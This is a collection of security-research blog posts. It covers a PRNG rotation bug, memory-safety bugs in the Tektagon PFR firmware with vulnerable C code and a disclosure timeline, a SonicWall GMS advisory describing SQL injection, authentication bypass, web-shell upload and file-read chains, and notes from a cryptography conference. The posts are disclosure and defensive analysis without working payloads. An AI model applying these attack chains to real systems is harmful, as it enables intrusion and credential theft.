In this case, a value containing a single 1-bit as input results in an output consisting of seventeen (17) 1s! This helps explain why the output that originally caught our eye contained so many -1 bytes.

The usage of the incorrect shift operation is a damaging bias in the output distribution. To illustrate this bias, the figure below shows a plot of the output distribution of the ChaChaPRNG implementation when seeded with the same seed as in the examples, and used to generate a total of 10,000 32-byte samples. In the figure below, the bytes are normalized to be in the [0, 255] range. The most striking outlier is the value 255 (the -1 discussed previously), which appears with probability over 20%. But other values also have significant biases, such as 0 (which appears with probability 2.46%) or 81 (which appears with probability 2.50%). In a truly random distribution, a given byte should appear with probability 1/256 = 0.390625.

Research has shown that leaking as little as one bit of an ECDSA nonce could lead to full key recovery. Thus, using the output of this PRNG for cryptographic applications could completely break the security of the systems that rely upon it.

The fix

In this instance, the fix was pretty simple. Replacing the right-shift operator in the rotateLeft32() function by an unsigned right shift ( >>> ) did the trick:

return (x << s) | (x >>> (n - s));

The figure below shows the “corrected” output distribution after modifications of the rotateLeft32(), with the same number of samples and the same seed as for the first figure. The vertical axis is cut off at the 3% mark to better show the distribution without the visualization being skewed by the higher-percentage 255 output. The corrected output distribution looks much more uniform.

Conclusion

When writing security-critical code, low level details such as bit operations on underlying number representation can have colossal consequences. In this post, we described a real-world case of a single missing “greater-than” character that totally broke the security of the PRNG built on top of the buggy function. This highlights the challenges of porting implementations between languages supporting different primitive types and arithmetic operations.

I’d like to thank Giacomo Pope and Gérald Doussot for their feedback on this post and for their careful review. Any remaining errors are mine alone.

LeaPFRogging PFR Implementations

23 August 2023 at 13:51

Back in October of 2022, this announcement by AMI caught my eye. AMI has contributed a product named “Tektagon Open Edition” to the Open Compute Project (OCP). 

Tektagon OpenEdition is an open-source Platform Root of Trust (PRoT) solution with foundational firmware security features that detect platform firmware corruption, recover the firmware and protect firmware integrity. With its open-source code, Tektagon OpenEdition™ augments transparency, resulting in high-quality code […] 

I decided to dig in and audit the recently open sourced code. But first, some background: Tektagon is a hardware root-of-trust (HRoT) that implements Intel PFR 2.0. So… What exactly is PFR? 

Platform Firmware Resiliency 

PFR, or Platform Firmware Resiliency, is a standard defined by everyone’s favorite standards body, NIST, in SP 800-193. The specification describes guidelines that support the resiliency of platform firmware and data against destructive attacks or unauthorized changes. These security properties are upheld by a new HRoT device that implements the PFR logic. 

At its core, PFR acknowledges that in addition to the boot firmware (e.g., the BIOS), a platform contains numerous other peripheral devices which execute firmware and therefore also require integrity verification. Examples of these peripherals typically include GPUs, network cards, storage controllers, display controllers, and so on. Many of these peripherals are highly privileged (e.g., DMA capable), and so they are attractive targets for an attacker. It is important that their firmware images are protected from tampering. That is, if an attacker could compromise one of these peripherals by tampering with its firmware, they might be able to: 

  1. Achieve persistence on the platform across reboots.
  2. Pivot towards compromising other more highly privileged firmware components.  
  3. Violate multi-tenant isolation and confidentiality expectations in cloud environments. 

Although these motivations sound like they are centered around only protecting the integrity of the platform firmware and its data assets, the SP 800-193 specification also describes how PFR is crucial for protecting firmware availability. Here, availability refers to the ability to recover from corrupted flash storage, which might occur due to a failed firmware update, or perhaps, cosmic rays that cause bit flips in flash.

In the PFR specification, these security requirements appear as three guiding principles:  

  1. Protection: How authenticity and integrity of firmware and data should be upheld. 
  2. Detection: How to detect when firmware or data integrity has been violated.  
  3. Recovery: How to restore the platform to a known good state.  

This is a somewhat crowded technology space. In addition to AMI’s Tektagon product, many other vendors have created their own PFR (or PFR-like) solutions whose purpose is to help assure device firmware authenticity and availability, further complicating the already complex x86 system boot process. Examples include Microsoft’s Project Cerberus which is used in Azure, Intel PFR, Google Titan, Lattice’s Root of Trust FPGA solution, and more. 

PFR Attack Surfaces 

PFR introduces a new device, a microcontroller or FPGA, that positions itself as the man-in-the-middle on the flash memory SPI bus. By sitting on the bus, PFR chipsets can interpose all bus transactions. Whenever a device (such as the Board Management Controller (BMC) or Platform Controller Hub (PCH)) reads or writes SPI flash, the PFR chipset proxies that request. This grants PFR the crucial responsibility of verifying the authenticity and integrity of all code and data that resides in the persistent storage media. 

A simplified block diagram of a typical PFR solution

However, by interposing buses in this manner, PFR exposes itself to a rather large attack surface. It must read, parse, and verify various binary blobs (firmware and data) that exist in flash. Such parsing can be a tedious and delicate process. If the code is not written defensively (a challenge for even the best C programmers) then memory safety violations may arise. Another concern is race conditions such as time-of-check-time-of-use (TOCTOU) or double fetch problems. 

The PFR attack surface is also expanded by the fact that it communicates with other devices via I2C or SMBus. The bus typically carries the MCTP and SPDM protocols. Without going into too much detail about these specifications, these protocols are used to:

  1. Establish a secure messaging channel between devices and IP blocks.
  2. Perform device firmware attestation.
  3. Detect and recover from TCB (Trusted Computing Base) failures.

Within the HRoT, these command handlers may accept variable length arguments, and so memory safety is again required when managing the message queues. 

So, with that in mind, I decided to jump into the recently open-sourced AMI Tektagon project and hunt for bugs. 

Vulnerability #1: I2C Command Handler 

This first vulnerability occurs in the PCH/BMC command handler. This is the same I2C communication interface that was mentioned above. Two of the command handlers violate memory safety.  

uint8_t gUfmFifoData[64]; 
uint8_t gReadFifoData[64]; 
... 
uint8_t gFifoData; 
... 
static unsigned int mailBox_index; 

uint8_t PchBmcCommands(unsigned char *CipherText, uint8_t ReadFlag) 
{ 
    byte DataToSend = 0; 
    uint8_t i = 0; 

    switch (CipherText[0]) { 
        ... 
        case UfmCmdTriggerValue: 
            if (ReadFlag == TRUE) { 
                DataToSend = get_provision_commandTrigger(); 
            } else { 
                if (CipherText[1]   EXECUTE_UFM_COMMAND) { 
                    ... 
                } else if (CipherText[1]   FLUSH_WRITE_FIFO) { 
                    memset( gUfmFifoData, 0, sizeof(gUfmFifoData)); 
                    gFifoData = 0; 
                } else if (CipherText[1]   FLUSH_READ_FIFO) { 
                    memset( gReadFifoData, 0, sizeof(gReadFifoData)); 
                    gFifoData = 0; 
                    mailBox_index = 0; 
                } 
            } 
            break; 

        case UfmWriteFIFO: 
            gUfmFifoData[gFifoData++] = CipherText[1]; 
            break; 

        case UfmReadFIFO: 
            DataToSend = gReadFifoData[mailBox_index]; 
            mailBox_index++; 
            break; 
        ...

Above, the UfmWriteFIFO command can eventually write data past the end of the gUfmFifoData[] array. This may occur if the attacker issues more than 64 commands in sequence without flushing the FIFO by sending a UfmCmdTriggerValue command. Because gFifoData is a uint8_t type, this enables an attacker to overwrite up to 192 bytes past the end of the FIFO buffer. 

Similarly, the UfmReadFIFO command can read data out-of-bounds by repeated invocations of the command between FIFO flushes. This OOB data appears to be eventually disclosed in the I2C response message in DataToSend. Because mailbox_index is an unsigned int type, this would enable an attacker to disclose a significant quantity of PFR SRAM, albeit relatively slowly due to only 1 byte being exposed at a time. 

I estimate that these command processing vulnerabilities can be triggered in three different scenarios: 

  1. A physical attacker that is tampering with the I2C bus traffic and injecting PCH/BMC commands to the Tektagon device. Physical attacks can often be discounted for cloud platforms where data centers are expected to be secured facilities, however thought should be given to whether a given deployment is vulnerable to supply chain attacks and hardware implants, as well as malicious or compelled insiders (especially in cases where servers are deployed in third party data centers where physical security is harder to monitor). 
  2. Given the prevalence of BMC vulnerabilities that have been discovered over the last several years, a more likely attack scenario is that a compromised BMC is aiming to pivot towards compromising the Tektagon device in order to undermine the platform’s PFR capabilities or to achieve persistence. 
  3. If the I2C bus happened to be a shared bus with multiple other peripherals of lesser privilege, then one could imagine a scenario where the host kernel (in the CPU) could access this bus and communicate directly with the PFR device, even if that was never the intention. 

Vulnerability #2: SPI Flash Parsing 

The next vulnerability occurs when the Tektagon firmware reads a public key from SPI flash. In the linked GitHub issue, I found and reported five instances where this same bug appears throughout the Tektagon source code, but for the sake of brevity, I will focus on just one simple example here. 

int get_rsa_public_key(uint8_t flash_id, uint32_t address, struct rsa_public_key *public_key) 
{ 
    int status = Success; 
    uint16_t key_length; 
    uint8_t  exponent_length; 
    uint32_t modules_address, exponent_address; 

    // Key Length 
    status = pfr_spi_read(flash_id, address, sizeof(key_length),  key_length); 
    if (status != Success){ 
        return Failure; 
    } 
 
    modules_address = address + sizeof(key_length); 
    // rsa_key_module 
    status = pfr_spi_read(flash_id, modules_address, key_length, public_key->modulus); 
    ... 

The code above performs two SPI flash reads. The first read operation obtains a size value (key_length) from a public key structure in flash, and the second read operation uses this key_length to obtain the RSA public key modulus.  

The bug arises due to lack of input validation. If the contents of external SPI flash were tampered with by an attacker, then key_length may be larger than expected. This length value is not validated before being passed as the size argument to the second pfr_spi_read() call, which can lead to out-of-bounds memory writes of public_key->modulus[].  

The modulus buffer is RSA_MAX_KEY_LENGTH (512) bytes in length, and in all locations where get_rsa_public_key() is called, the public_key structure is declared on the stack. Because the Zephyr build config used by Tektagon does not define CONFIG_STACK_CANARIES, such a stack-based memory corruption vulnerability would be highly exploitable. 

Conclusion

These two vulnerabilities were extremely shallow, and I discovered them both in the same afternoon after first pulling the source code from GitHub. I am fairly certain that other vulnerabilities exist in this code.  

(As an aside, you might also be interested to know that Tektagon is based on the Zephyr RTOS, for which we published a research report a few years back, highlighting numerous vulnerabilities in both its implementation and design.) 

These bugs are great illustrations of how a “security feature” is not always a “secure feature”. Although PFR aims to improve platform security, it does so at the cost of introducing new attack surfaces. Bugs in these attack surfaces can be abused to achieve privilege escalation by the very same adversaries and threats that PFR is designed to defend against – that is, threats involving maliciously tampered SPI flash contents, and adversaries who have compromised a peripheral device and are seeking to pivot laterally to attack another device firmware. 

Think carefully about the threat model of your products, and how adding new features and attack surfaces might affect your overall security posture. As always, we recommend you perform a full assessment of any third-party firmware components before they make it into your product. This is just as true for open source as it is for proprietary code bases, and in particular, new and untested components and technologies. 

As of April 6th 2023, these vulnerabilities were fixed in commit d6d935e. No CVEs were issued by AMI. 

Disclosure Timeline 

  • Oct 25, 2022 – Initial disclosure on GitHub. 
  • Nov 3, 2022 – Response from vendor indicating that fixes are in progress. 
  • Jan 6, 2023 – NCC Group requests an update. 
  • Jan 13, 2023 – Vendor communicated a plan to release fixes by end of January. 
  • Feb 10, 2023 – NCC Group requests an update. 
  • Feb 13, 2023 – Vendor revised plan to release fixes by end of February or early March. 
  • Mar 31, 2023 – NCC Group requests another update.
  • Apr 4, 2023 – Vendor indicates the next release is planned on or before the 2nd week of April.
  • Apr 6, 2023 – Commit d6d935e reorganizes the repo. It fixes vulnerability #1 but only partially fixes vulnerability #2.
  • May 2, 2023 – NCC Group reviewed above commit and provided detailed analysis of the unfixed issues.
  • May 5, 2023 – Vendor communicated that the remaining fixes will land by May 12th.
  • May 31, 2023 – NCC Group queried the status of the fixes.
  • July 25, 2023 – Vendor indicated that remaining unfixed functions are dead/unused code.
  • Aug 18, 2023 – NCC Group reviewed the code to confirm that the functions are unused.
  • Aug 23, 2023 – Publication of this advisory.

Technical Advisory – SonicWall Global Management System (GMS) & Analytics – Multiple Critical Vulnerabilities

24 August 2023 at 13:08

Multiple Unauthenticated SQL Injection Issues Security Filter Bypass – CVE-2023-34133

Title: Multiple Unauthenticated SQL Injection Issues   Security Filter Bypass
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34133
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS web application was found to be vulnerable to numerous SQL injection issues. Additionally, security mechanisms that were in place to help prevent against SQL Injection attacks could be bypassed.

Impact

An unauthenticated attacker could exploit these issues to extract sensitive information, such as credentials, reset user passwords, bypass authentication, and compromise the underlying device.

Web Service Authentication Bypass – CVE-2023-34124

Title: Web Service Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34124
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the Web Services application did not adequately perform authentication checks, as no secret information was required to perform authentication.

The authentication mechanism employed by the GMS /ws application used a non-secret value when performing HTTP digest authentication. An attacker could easily supply this information, allowing them to gain unauthorised access to the application and call arbitrary Web Service methods.

Impact

An attacker with knowledge of authentication mechanism would be able to generate valid authentication codes for the GMS Web Services application, and subsequently call arbitrary methods. A number of these Web Service methods were found to be vulnerable to additional issues, such as arbitrary file read and write (see CVE-2023-34135, CVE-2023-34129 and CVE-2023-34134). Therefore, this issue could lead to the complete compromise of the host.

Predictable Password Reset Key – CVE-2023-34123

Title: Password Hash Read via Web Service
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34123
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS /appliance application uses a hardcoded key value to generate password reset keys. This hardcoded value does not change between installs. Furthermore, additional information used during password reset code calculation is non-secret and can be discovered from an unauthenticated perspective.

An attacker with knowledge of this information could generate their own password reset key to reset the administrator account password. Note that this issue is only exploitable in certain configurations. Specifically, if the device is registered, or if it is configured in “Closed Network” mode.

Impact

An attacker with knowledge of the hardcoded 3DES key used to validate password reset codes could generate their own password reset code to gain unauthorised, administrative access to the appliance. An attacker with unauthorised, administrative access to the appliance could exploit additional post-authentication vulnerabilities to achieve Remote Code Execution on the underlying device. Additionally, they could gain access to other devices managed by the GMS appliance.

CAS Authentication Bypass – CVE-2023-34137

Title: CAS Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34137
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the CAS Web Service (exposed via /ws/cas) did not adequately perform authentication checks, as it used a hardcoded secret value to perform cryptographic authentication checks. The CAS Web Service validated authentication tokens by calculating the HMAC SHA-1 of the supplied username. However, the HMAC secret was static. As such, an attacker could calculate their own authentication tokens, allowing them to gain unauthorised access to the CAS Web Service.

Impact

An attacker with access to the application source code (for example, by downloading a trial VM), could discover the static value used for calculating HMACs – allowing them to generate their own authentication tokens. An attacker with the ability to generate their own authentication tokens would be able to make legitimate use of the CAS API, as well as exploit further vulnerabilities within this API; for example, SQL Injection – resulting in complete compromise of the underlying host.

Post-Authenticated Command Injection – CVE-2023-34127

Title: Post-Authenticated Command Injection
Risk: 8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34127
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to search for log files on the system. This could allow an authenticated attacker to execute arbitrary code with root privileges.

Impact

An authenticated, administrative user can execute code as root on the underlying file system. For example, they could use this vulnerability to write a malicious cron job, web-shell, or stage a remote C2 payload. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Password Hash Read via Web Service – CVE-2023-34134

Title: Password Hash Read via Web Service
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34134
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An authenticated attacker can read the administrator password hash via a web service call.

Note that whilst this issue requires authentication, it can be chained with an authentication bypass to exploit the issue from an unauthenticated perspective.

Impact

This issue can be chained with CVE-2023-34124 to read the administrator password hash from an unauthenticated perspective. Following this, an attacker could launch further post-authentication attackers to achieve Remote Code Execution.

Post-Authenticated Arbitrary File Read via Backup File Directory Traversal – CVE-2023-34125

Title: Post-Authenticated Arbitrary File Read via Backup File Directory Traversal
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34125
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when downloading backup files. This could allow an authenticated attacker to read arbitrary files from the underlying filesystem with root privileges.

Impact

An authenticated, administrative user can read any file on the underlying file system. For example, they could read the password database to retrieve user-passwords hashes, or other sensitive information. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Upload – CVE-2023-34126

Title: Post-Authenticated Arbitrary File Upload
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to upload files to the system. This could allow an authenticated upload files anywhere on the system with root privileges.

Impact

An authenticated, administrative user can upload files as root on the underlying file system. For example, they could use this vulnerability to upload a web-shell. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34124) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) – CVE-2023-34129

Title: Post-Authenticated Arbitrary File Write via Web Service (Zip Slip)
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service endpoint was found to be vulnerable to directory traversal whilst extracting a malicious ZIP file (a.k.a. ZipSlip). This could be exploited to write arbitrary files to any location on disk.

Impact

An authenticated attacker may be able to exploit this issue to write arbitrary files to any location on the underlying file system. These files would be written with root privileges. By writing arbitrary files, an attacker could achieve Remote Code Execution. Whilst this issue requires authentication, it could be chained with other issues, such as CVE-2023-34124 (Web Service Authentication Bypass), to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Read via Web Service – CVE-2023-34135

Title: Post-Authenticated Arbitrary File Read via Web Service
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier 
CVE Identifier: CVE-2023-34135
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service method allows an authenticated user to read arbitrary files from the underlying file system.

Impact

A remote attacker can read arbitrary files from the underlying file system with the privileges of the Tomcat server (root). When combined with CVE-2023-34124, this issue can allow an unauthenticated attacker to download any file of their choosing. For example, reading the /opt/GMSVP/data/auth.txt file to retrieve the administrator’s password hash.

Client-Side Hashing Function Allows Pass-the-Hash – CVE-2023-34132

Title: CAS Authentication Bypass
Risk: 4.9 (Medium) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34132
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The client-side hashing algorithm used during the logon was found to enable pass-the-hash attacks. As such, an attacker with knowledge of a user’s password hash could log in to the application without knowledge of the underlying plain-text password.

Impact

An attacker who is in possession of a user’s hashed password would be able to log in to the application without knowledge of the underlying plain-text password. By exploiting an issue such as CVE-2023-34134 (Password Hash Read via Web Service), an attacker could first read the user’s password hash, and then log in using that password hash, without ever having to know the underlying plain-text password.

Hardcoded Tomcat Credentials (Privilege Escalation) – CVE-2023-34128)

Title: Hardcoded Tomcat Credentials (Privilege Escalation)
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34128
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of plain-text credentials were found to be hardcoded both within the application source code and within the users.xml configuration file on the GMS appliance. These credentials did not change between installs and were found to be static. Therefore, an attacker who can decompile the application source code would easily be able to discover these credentials.

Impact

An attacker with access to the Tomcat manager application (via https://localhost/) would be able to utilise the appuser account credentials to gain code execution as the root user, by deploying a malicious WAR file. As the Tomcat manager application is only exposed to localhost by default, an attacker would require an SSRF vulnerability, or the ability to tunnel traffic to the Tomcat Manager port (through SOCKS over SSH, for example). However, this could also be exploited as local privilege escalation vector in the case where an attacker has gained low privileged access to the OS (e.g., via the postgres user or snwlcli users).

Unauthenticated File Upload – CVE-2023-34136

Title: Unauthenticated File Upload
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34136
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An unauthenticated user can upload an arbitrary file to a location not controlled by the attacker.

Impact

Whilst the location of the upload is not controllable by the attacker this vulnerability can be used in conjunction with other vulnerabilities, such as CVE-2023-34127 (Command Injection), to allow an attacker to upload a web-shell as the root user.

Additionally, there are several functions within the GMS application which execute .sh or .bat files from the Tomcat Temp directory. An attacker could upload a malicious script file which might later be executed by the GMS (during a firmware update, for example).

Unauthenticated Sensitive Information Leak – CVE-2023-34131

Title: Unauthenticated Sensitive Information Leak
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34131
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of pages were found to not require any form of authentication, which could allow an attacker to glean sensitive information about the device, such as serial numbers, internal IP addresses and host-names – which could be later used by an attacker as a prerequisite for further attacks.

Impact

An attacker could leak sensitive information such as the device serial number, which could be later used to inform further attacks. As an example, the serial number is required to exploit CVE-2023-34123 (Predictable Password Reset Key). An attacker can easily glean this information by making a simple request to the device, thus decreasing the complexity of such attacks.

Use of Outdated Cryptographic Algorithm with Hardcoded Key – CVE-2023-34130

Title: Unauthenticated Sensitive Information Leak
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34130
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found make use of a customised version of the Tiny Encryption Algorithm (TEA) to encrypt sensitive data. TEA is a legacy block-cipher which suffers from known weaknesses. It’s usage is discouraged in favour of AES, which provides enhanced security, is widely supported, and is included in most standard libraries (e.g. javax.crypto).

Additionally, the encryption key used by the application was found to be hardcoded within the application source code. This means that regardless of any known weakness in the encryption algorithm, or the method used to encrypt the data, an attacker with access to the source code will be able to decrypt any data encrypted with this key.

Impact

An attacker with access to the source code (for example, by downloading a trial VM), could easily retrieve the hardcoded TEA key. Using this key, the attacker could decrypt sensitive information hardcoded within the web application source code, which could aid in compromising the device.

Furthermore, by combining this issue with various other issues (such as authentication bypass and arbitrary file read), an attacker could retrieve and decrypt configuration files containing user passwords. This would ultimately allow an attacker to compromise both the application and underlying Operating System.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2023-08-24

Written by:  Richard Warren

Real World Cryptography Conference 2023 – Part II

25 August 2023 at 13:00

After a brief interlude, filled with several articles from the Cryptography Services team, we’re back with our final thoughts from this year’s Real World Cryptography Conference. In case you missed it, check out Part I for more insights.

  1. Interoperability in E2EE Messaging
  2. Threshold ECDSA Towards Deployment
  3. The Path to Real World FHE: Navigating the Ciphertext Space
  4. High-Assurance Go Cryptography in Practice

Interoperability in E2EE Messaging

A specter is haunting Europe – the specter of platform interoperability. The EU signed the Digital Market Acts (DMA) into law in September of last year, mandating chat platforms provide support for interoperable communications. This requirement will be in effect by March of 2024, an aggressive timeline requiring fast action from cryptographic (and regular) engineers. There are advantages to interoperability. It allows users to communicate with their friends and family across platforms, and it allows developers to build applications that work across platforms. There is the potential for this to partially mitigate the network effects associated with platform lock-in, which could lead to more competition and greater freedom of choice for end users. However, interoperability requires shared standards, and standards tend to imply compromise. This is a particularly severe challenge with secure chat apps which aim to provide their users with high levels of security. Introducing hastily designed, legislatively mandated components into these systems is a high-risk change which, in the worst case, could introduce weaknesses which, if introduced, would be difficult to fix (due to the effects of lock-in and the corresponding level of coordination and engineering effort required). This is further complicated by the heterogeneity of the field in regard to end-to-end encrypted chat: E2EE protocols vary by ciphersuite, level and form of authentication, personal identifier (email, phone number, username/password, etc.), and more. Any standardized design for interoperability would need to be able to manage all this complexity. This presentation on work by Ghosh, Grubbs, Len, and Rösler discussed one effort at introducing such a standard for interoperability between E2EE chat apps, focused on extending existing components of widely used E2EE apps. This is appropriate as these apps are most likely to be identified as “gatekeeper” apps to which the upcoming regulations apply in force. The proposed solution uses server-to-server interoperability, in which each end user is only required to directly communicate with their own messaging provider. Three main components of messaging affected by the DMA are identified: identity systems, E2EE protocols, and abuse prevention.

  • For the first of these items, a system for running encrypted queries to remote providers’ identity systems is proposed; this allows user identities to be associated with keys in such a way that the actual identity data is abstracted and thus could be an email, a phone number, or an arbitrary string.
  • For the second issue, E2EE encryption, a number of simple solutions are considered and rejected; the final proposal has several parts. Sender-anonymous wrappers are proposed, using a variant of the Secure Sender protocol from Signal, to hide sender metadata; for encryption in transit, non-gatekeeper apps can use an encapsulated implementation of a gatekeeper app’s E2EE through a client bridge. This provides both confidentiality and authenticity, while minimizing metadata leakage.
  • For the third issue, abuse prevention, a number of options (including “doing nothing” are again considered and rejected). The final design is somewhat nonobvious, and consists of server-side spam filtering, user reporting (via asymmetric message franking, one of the more cryptographically fresh and interesting parts of the system), and blocklisting (which requires a small data leakage, in that the initiator would need to share the blocked party’s user ID with their own server).

Several open problems were also identified (these points are quoted directly from the slides):

  • How do we improve the privacy of interoperable E2EE by reducing metadata leakage?
  • How do we extend other protocols used in E2EE messaging, like key transparency, into the interoperability setting?
  • How do we extend our framework and analyses to group chats and encrypted calls?

This is important and timely work on a topic which has the potential to result in big wins for user privacy and user experience; however, this best-case scenario will only play out if players in industry and academia can keep pace with the timeline set by the DMA. This requires quick work to design, implement, and review these protocols, and we look forward to seeing how these systems take shape in the months to come.

Eli Sohl

Threshold ECDSA Towards Deployment

A Threshold Signature Scheme (TSS) allows any sufficiently large subset of signers to cryptographically sign a message. There has been a flurry of research in this area in the last 10 years, driven partly by financial institutions’ needs to secure crypto wallets and partly by academic interest in the area from the Multiparty Computation (MPC) perspective. Some signature schemes are more amenable to “thresholding” than others. For example, due to linearity features of “classical” Schnorr signatures, Schnorr is more amenable to “thresholding” than ECDSA (see the FROST protocol in this context). As for thresholding ECDSA, there are tradeoffs as well; if one allows using cryptosystems such as Pallier’s, the overall protocol complexity drops, but speed and extraneous security model assumptions appear to suffer. The DKLS papers, listed below, aim for competitive speeds and minimizing necessary security assumptions:

  • DKLS18: “Secure Two-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
  • DKLS19: “Secure Multi-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat

